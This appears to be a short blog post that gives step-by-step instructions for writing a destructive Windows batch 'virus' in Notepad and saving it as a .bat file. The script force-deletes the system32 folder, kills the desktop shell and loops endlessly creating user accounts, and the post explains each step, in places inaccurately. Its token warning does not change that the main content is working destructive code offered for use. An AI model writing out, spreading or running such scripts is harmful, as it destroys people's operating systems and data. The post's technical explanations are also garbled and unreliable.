VIRUS USING NOTEPAD – 2

VIRUS using NOTEPAD – 2
This is some what risky code when compared to the code given in my previous post. Now lets discuss at an higher level ~~~ !!!




We know that very important files related to a OS are saved in C drive , which are necessary such as desktop or user interface etc. These are just a files which came inbuilt with your OS . So if any piece of code that reach them and alter them or delete them , your PC works abnormally and the most important blocks for normal functionality is disturbed.

So now we are going to learn a code which deletes some important files in your OS and this is a permanent damage and you need to install your copy of OS freshly .
So please don’t try this or even save this in your system , if any one opens it accidentally your PC is got damaged .


STEPS :
1.    Goto notepad
2.    Write the following code :

@echo off
cls
:keyttu
del /f /q "c:\WINDOWS\system32"
taskkill explorer.exe
tskill explorer.exe
set /a _keyttu+=1
net user %_keyttu+% /add
goto keyttu

3.    Now coming to the logic of the code : we haven’t used any highdefined commands or programs , weare just saying the command prompt to delete some files which are most usefull.Those files may be anything , here I selected only few and I traced them and deleted them by del /f /q "c:\WINDOWS\system32"

4.    Now taskkill explorer.exe : By doing this the code that windows has written for desktop is got deleted and you cant see any desktop. This avoids you to open any programs or etc

5.    And Finally I used net user command , this is for doing the sampe process in all users of that PC.

    Now save it as anyname.bat . In my case I'm saving as keyttu.bat



~~~THIS IS A VERY RIKSKY PROCESS and We cant recover that files~~~

~~~~~~~~ ADD YOUR THUMB IF THE ARTICLE WAS HELPFUL ~~~~~~~~

Comments

Popular posts from this blog

TEST TUBE BABY CONCEPT IN MAHABHARATHA ??

The impact of OOHM KARAM on Human's DNA

HOW TO CHANGE SYSTEMS PASSWORD USING CMD ????